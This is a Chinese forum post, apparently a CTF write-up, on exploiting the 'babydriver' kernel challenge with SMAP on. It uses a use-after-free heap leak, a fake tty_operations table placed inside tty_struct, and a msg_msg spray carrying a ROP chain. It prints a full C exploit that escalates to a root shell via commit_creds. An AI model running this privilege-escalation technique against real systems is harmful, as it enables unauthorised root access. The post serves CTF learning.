首页
社区
课程
招聘
[原创]Kernel PWN-开启smap保护的babydrive
发表于: 2023-3-10 15:49 19000

[原创]Kernel PWN-开启smap保护的babydrive

2023-3-10 15:49
19000

由于原本的babydrive启动脚本里,没有开启smap,所以内核可以访问用户态的数据,因此我们才能够将fake_tty_operation和我们的rop布置到用户态。可是当我们开启了smap保护之后,内核态就没有办法访问用户态的数据,此时当我们再hijack tty_operation到我们的用户态时,我们的kernel就会panic,更别说劫持执行流到用户态上执行rop了。

此时就需要我们想一个办法,把fake_tty_operation布置到内核空间并且还得再布置一个rop,除此之外还得知道布置的内核位置在哪。

那么如何往内核里面丢垃圾呢,这里有一个选择就是喷他一发msg_msg

msg_msg在linux 中用于进程之间通讯,在msgget函数调用后,会创建一条消息队列在内核空间中会创建一个 msg_queue 结构体,在调用msgsnd时就会发送一条msg的消息到指定队列上。

当我们调用msgsnd时,在linux内核中会调用do_msgsnd

在经过两个检验后,就会调用load_msg,跟进该函数

可以看到调用alloc_msg后会调用copy_from_user来将用户的信息复制进内核里。而alloc_msg里

会根据用户发送的msg大小来调用kmalloc申请内存。因此,借助msg_msg我们可以实现任意大小的分配内核空间,并且可以控制该空间除去msg头(0x30)大小外的所有内存内容(这不就是堆

由于我们拥有了一个朴实无华的UAF,并且可以通过对驱动的交互来实现对该指针指向的内存空间进行读写操作。

当我们free掉一个object时,该object内就会有下一个空闲object的地址,因此我们可以leak出该freelist的地址。
ppuryh4.md.png

可以看到rdi寄存器这就是当前还存有空闲object的freelist,在后续的申请中,我们也是有机会取出这里面的object的。

在freelist上的object,都会存在一个指针指向下一个空闲的object,下图就是
ppurg39.md.png

因此当我们在free掉原本的object时,再读里面的内容,就能轻轻松松的leak出来heap_addr

上文中提到,开启smap后,内核无法直接访问用户态的数据,因此这时候我们的tty_operation也需要布置到内核空间,才能成功的在对tty设备操作时调用到我们布置的gadget。

在这里鼠鼠我由于比较懒,不想再喷一次msg_msg,于是突发奇想,想到能不能利用tty_struct里没有数据的地方来布置我们的tty_operation,这样就不用再喷一次,难为一个刚入门kernel的lese了(笑)

ppuroND.md.png

可以看到原本tty_struct前面的部分是如此,在tty_struct+0x1a0的地方,鼠鼠我找到了一块没数据的地方

ppurH9H.png

于是鼠鼠计划把我的fake_tty_operation写到这里,利用题目中baby_write函数,把fake tty struct和fake tty operation一次性写进去,一炮双响,完成hijack tty operation和在内核空间布置fake tty operation的壮举。

ppurb3d.png

效果如图

从上文对msgsnd函数的分析,我们可以利用msgsnd来布置rop链,于此同时由于我们已经leak 了freelist上的地址,所以可以多次使用msgsnd发送合适size的消息,就有机会拿到已知地址的freelist上的object并且往里面写入rop链子,并且由于有freelist地址,再配合鼠鼠我找到的pop rsp; ret;这条gadget,就能直接跳到rop上,完成get root。

利用msgsnd布置rop时发生了一些鼠鼠目前没搞明白的东西,但是为了避免大家看鼠鼠的水文摸不着头脑,就小提一嘴

我的rop链如下

而用msgsnd后,我的rop第一条和第二条会断开

ppurqgA.md.png

鼠鼠对源码的理解很浅,所以也不明白为什么会如此,有明白为什么的师傅可以教教0r2

由于鼠鼠的堆喷实属刚入门,水平低下,所以写出来的exp内核布局不稳定,qemu启动后建议直接运行exp拿root权限,如果用了一些命令行的话,exp就可能会寄。

攻击效果:

ppurLjI.png
题目附件:eabK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6H3j5h3&6Q4x3X3g2T1j5h3W2V1N6g2)9J5k6h3y4G2L8g2)9J5c8Y4y4Q4x3V1j5I4i4K6g2X3c8$3y4t1j5$3E0@1K9$3y4A6d9g2S2b7b7@1M7@1j5X3#2y4M7q4y4%4i4K6y4r3M7s2N6V1i4K6y4p5k6$3q4E0k6b7`.`.
提取码:game

 
 
 
static long do_msgsnd(int msqid, long mtype, void __user *mtext,
                size_t msgsz, int msgflg)
{
        struct msg_queue *msq;
        struct msg_msg *msg;
        int err;
        struct ipc_namespace *ns;
        DEFINE_WAKE_Q(wake_q);
 
        ns = current->nsproxy->ipc_ns;
 
        if (msgsz > ns->msg_ctlmax || (long) msgsz < 0 || msqid < 0)
                return -EINVAL;
        if (mtype < 1)
                return -EINVAL;
 
        msg = load_msg(mtext, msgsz);
.....
}
static long do_msgsnd(int msqid, long mtype, void __user *mtext,
                size_t msgsz, int msgflg)
{
        struct msg_queue *msq;
        struct msg_msg *msg;
        int err;
        struct ipc_namespace *ns;
        DEFINE_WAKE_Q(wake_q);
 
        ns = current->nsproxy->ipc_ns;
 
        if (msgsz > ns->msg_ctlmax || (long) msgsz < 0 || msqid < 0)
                return -EINVAL;
        if (mtype < 1)
                return -EINVAL;
 
        msg = load_msg(mtext, msgsz);
.....
}
struct msg_msg *load_msg(const void __user *src, size_t len)
{
        struct msg_msg *msg;
        struct msg_msgseg *seg;
        int err = -EFAULT;
        size_t alen;
 
        msg = alloc_msg(len);
        if (msg == NULL)
                return ERR_PTR(-ENOMEM);
 
        alen = min(len, DATALEN_MSG);
        if (copy_from_user(msg + 1, src, alen))
                goto out_err;
 
        for (seg = msg->next; seg != NULL; seg = seg->next) {
                len -= alen;
                src = (char __user *)src + alen;
                alen = min(len, DATALEN_SEG);
                if (copy_from_user(seg + 1, src, alen))
                        goto out_err;
        }
 
        err = security_msg_msg_alloc(msg);
        if (err)
                goto out_err;
 
        return msg;
 
out_err:
        free_msg(msg);
        return ERR_PTR(err);
}
struct msg_msg *load_msg(const void __user *src, size_t len)
{
        struct msg_msg *msg;
        struct msg_msgseg *seg;
        int err = -EFAULT;
        size_t alen;
 
        msg = alloc_msg(len);
        if (msg == NULL)
                return ERR_PTR(-ENOMEM);
 
        alen = min(len, DATALEN_MSG);
        if (copy_from_user(msg + 1, src, alen))
                goto out_err;
 
        for (seg = msg->next; seg != NULL; seg = seg->next) {
                len -= alen;
                src = (char __user *)src + alen;
                alen = min(len, DATALEN_SEG);
                if (copy_from_user(seg + 1, src, alen))
                        goto out_err;
        }
 
        err = security_msg_msg_alloc(msg);
        if (err)
                goto out_err;
 
        return msg;
 
out_err:
        free_msg(msg);
        return ERR_PTR(err);
}
static struct msg_msg *alloc_msg(size_t len)
{
        struct msg_msg *msg;
        struct msg_msgseg **pseg;
        size_t alen;
 
        alen = min(len, DATALEN_MSG);
        msg = kmalloc(sizeof(*msg) + alen, GFP_KERNEL_ACCOUNT);
        if (msg == NULL)
                return NULL;
 
        msg->next = NULL;
        msg->security = NULL;
 
        len -= alen;
        pseg = &msg->next;
        while (len > 0) {
                struct msg_msgseg *seg;
 
                cond_resched();
 
                alen = min(len, DATALEN_SEG);
                seg = kmalloc(sizeof(*seg) + alen, GFP_KERNEL_ACCOUNT);
                if (seg == NULL)
                        goto out_err;
                *pseg = seg;
                seg->next = NULL;
                pseg = &seg->next;
                len -= alen;
        }
 
        return msg;
 
out_err:
        free_msg(msg);
        return NULL;
}
static struct msg_msg *alloc_msg(size_t len)
{
        struct msg_msg *msg;
        struct msg_msgseg **pseg;
        size_t alen;
 
        alen = min(len, DATALEN_MSG);
        msg = kmalloc(sizeof(*msg) + alen, GFP_KERNEL_ACCOUNT);
        if (msg == NULL)
                return NULL;
 
        msg->next = NULL;
        msg->security = NULL;
 
        len -= alen;
        pseg = &msg->next;
        while (len > 0) {
                struct msg_msgseg *seg;
 
                cond_resched();
 
                alen = min(len, DATALEN_SEG);
                seg = kmalloc(sizeof(*seg) + alen, GFP_KERNEL_ACCOUNT);
                if (seg == NULL)
                        goto out_err;
                *pseg = seg;
                seg->next = NULL;
                pseg = &seg->next;
                len -= alen;
        }
 
        return msg;
 
out_err:
        free_msg(msg);
        return NULL;
}
 
 
 
 
 
 
 
 
 
 
 
 
 
rop[i++] = *(size_t*)"patekblue";
   rop[i++] = pop_rdi_ret;
   rop[i++] = init_cred;
   rop[i++] = commit_cred;
// rop[i++] = *(size_t*)"patekblue";
//   rop[i++] = (size_t)usr;
   rop[i++] = swapgs_pop_rbp_ret;
   rop[i++] = *(size_t*)"patekblue";
   rop[i++] = iretq_ret;
 
   rop[i++] = (size_t)getshell;
   rop[i++] = user_cs;
   rop[i++] = user_rflags;
   rop[i++] = user_sp;
   rop[i++] = user_ss;
rop[i++] = *(size_t*)"patekblue";
   rop[i++] = pop_rdi_ret;
   rop[i++] = init_cred;
   rop[i++] = commit_cred;
// rop[i++] = *(size_t*)"patekblue";
//   rop[i++] = (size_t)usr;
   rop[i++] = swapgs_pop_rbp_ret;
   rop[i++] = *(size_t*)"patekblue";
   rop[i++] = iretq_ret;
 
   rop[i++] = (size_t)getshell;
   rop[i++] = user_cs;
   rop[i++] = user_rflags;
   rop[i++] = user_sp;
   rop[i++] = user_ss;
 
 
#define _GNU_SOURCE
#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sched.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/msg.h>
size_t user_cs, user_ss, user_rflags, user_sp;
size_t commit_cred = 0xffffffff810a1420;
size_t init_cred = 0xffffffff81e48c60;
size_t mov_rsp_rax_dnc_ebx_ret = 0xffffffff8181bfc5;
size_t pop_rax = 0xffffffff8100ce6e;
size_t swapgs_pop_rbp_ret = 0xffffffff81063694;
size_t iretq_ret = 0xffffffff814e35ef;
size_t pop_rdi_ret = 0xffffffff810d238d;
size_t mov_rc4_rdi_pop_rbp_ret = 0xffffffff81004d80;
size_t pop_rsp_ret = 0xffffffff81171045;
size_t leak[0x60];
size_t fake_tty[0x200];
int fd1;
char meiyongde[10];
int  fd3;
void info(char *s , size_t address ){
    if (address) printf("\033[32m\033[1m[Info] %s : \033[0m%#lx\n", s, address);
    else printf("\033[32m\033[1m[Info] %s \033[0m\n", s);
}
 
 
void usr(){
 
 
void (*commit) (char*) = commit_cred;
(*commit)(init_cred);
 
 
}
 
 
void save_status(){
 
  __asm__(
        "mov user_cs, cs;"
        "mov user_ss, ss;"
        "mov user_sp, rsp;"
        "pushf;"
        "pop user_rflags;"
    );
    info("status saved!",0);
 
 
}
void getshell(){
   info("root!!!!!!",0);
   system("/bin/sh");
 
 
}
 
 
 
void bind_cpu(int core)
{
    cpu_set_t cpu_set;
 
    CPU_ZERO(&cpu_set);
    CPU_SET(core, &cpu_set);
    sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);
}
 
int main()
{   int ret = 0;
    cpu_set_t cpu_set;
    CPU_ZERO(&cpu_set);
    CPU_SET(0, &cpu_set);
    sched_setaffinity(0, sizeof(cpu_set), &cpu_set);
    int ms_qid[0x100];
    save_status();
    fd1=open("/dev/babydev",2);
    int fd2=open("/dev/babydev",2);
    ioctl(fd2,0x10001,0x2e0);
    close(fd2);
 
    info("try to read heapadd",0);
    read(fd1,leak,0x60);
    info("try to write heapadd",0);
    info("heapadd",leak[0]);
    fd3=open("/dev/ptmx",2);
    size_t fake_ktty_add;
    size_t rop[0x20];
    int i =0;
    fake_ktty_add = (size_t*)leak[0];
    fake_ktty_add = fake_ktty_add+0x800;
    info("check tty add",fake_ktty_add);
 
 
 
 
 
    rop[i++] = *(size_t*)"patekblue";
    rop[i++] = pop_rdi_ret;
    rop[i++] = init_cred;
    rop[i++] = commit_cred;
 // rop[i++] = *(size_t*)"patekblue";
 //   rop[i++] = (size_t)usr;
    rop[i++] = swapgs_pop_rbp_ret;
    rop[i++] = *(size_t*)"patekblue";
    rop[i++] = iretq_ret;
 
    rop[i++] = (size_t)getshell;
    rop[i++] = user_cs;
    rop[i++] = user_rflags;
    rop[i++] = user_sp;
    rop[i++] = user_ss;
    info("rop:",rop);
    size_t testrop[0x20];
    testrop[0] = 0x11111111;
    testrop[1] = 0x22222222;
    testrop[3] =  0x33333333;
    testrop[4] = 0x44444444;
    testrop[5] = 0x55555555;
    testrop[6] =  0x66666666;
    testrop[7] =  0xdeadbeef;
    size_t operation[0x10];
    size_t f_operation_add = fake_ktty_add + 0x1a0;
    info("check fake tty operation",f_operation_add);
 
    info("prepare fake tty_operation done!",0);
    info("try to hijack tty...",0);
 
    read(fd1,fake_tty,0x200);
    fake_tty[3] = f_operation_add;
    int t = 0x34;
  //  fake_tty[t] = pop_rsp_ret;
   // fake_tty[t++] = leak[0];
   size_t kernel_rop = fake_ktty_add +0x400 +0x30;
   info("check rop add in kernel space",kernel_rop);
    fake_tty[t] = pop_rsp_ret;
    fake_tty[t+1] = kernel_rop;
    for(int j = 2;j<8;j++){
 
    fake_tty[t+j] = mov_rsp_rax_dnc_ebx_ret;
 
 
 
    }
 
    int msg_id[5];
    for (int k = 0;k < 5;k++){
       msg_id[k] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT);
        if(msg_id[k]==-1){
 
            printf("get error msg_id : %d",k);
 
        }
        printf("sucess get msg_id : %d\n",k);
 
 
 
    }
 
    for (int w = 0; w < 5; w++)
    {
        ret = msgsnd((int*)msg_id[w],rop,0x2e0 - 0x30,0);
          if(ret==-1){
 
            printf("get error in : %d",w);
        }
 
    }
    write(fd1,fake_tty,0x200);
 
    write(fd3, meiyongde,10);
 
 
}
#define _GNU_SOURCE
#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sched.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/msg.h>
size_t user_cs, user_ss, user_rflags, user_sp;
size_t commit_cred = 0xffffffff810a1420;
size_t init_cred = 0xffffffff81e48c60;

[注意]看雪招聘,专注安全领域的专业人才平台!

最后于 2023-3-10 20:01 被patekblue编辑 ,原因: 图床有问题,更新附件
收藏
免费 8
支持
分享
最新回复 (6)
雪    币: 1403
活跃值: (3140)
能力值: ( LV6,RANK:90 )
在线值:
发帖
回帖
粉丝
2

谢谢分享

最后于 2023-3-10 16:07 被kotoriseed编辑 ,原因:
2023-3-10 16:06
0
雪    币: 1685
活跃值: (215867)
能力值: ( LV4,RANK:40 )
在线值:
发帖
回帖
粉丝
3
tql
2023-3-10 16:10
0
雪    币: 30899
活跃值: (64081)
能力值: (RANK:135 )
在线值:
发帖
回帖
粉丝
4

实例附件能否上传一份到论坛上?方便其他同学练习

最后于 2023-3-10 16:30 被Editor编辑 ,原因:
2023-3-10 16:30
0
雪    币: 227
活跃值: (189)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
5
Editor 实例附件能否上传一份到论坛上?方便其他同学练习
附件已放在文章结尾
2023-3-10 20:02
0
雪    币: 1221
活跃值: (1172)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
6
这道题的smap和smep以及kpti可以直接用tty+work_for_cpu绕过吧
2023-3-22 13:31
0
雪    币: 227
活跃值: (189)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
7
Loτυs 这道题的smap和smep以及kpti可以直接用tty+work_for_cpu绕过吧

应该是可以像2021qwb那题一样用work_for_cpu的吧,还没有研究过,work_for_cpu确实会更加稳定的提权

最后于 2023-3-23 17:11 被patekblue编辑 ,原因:
2023-3-23 17:11
0
游客
登录 | 注册 方可回帖
返回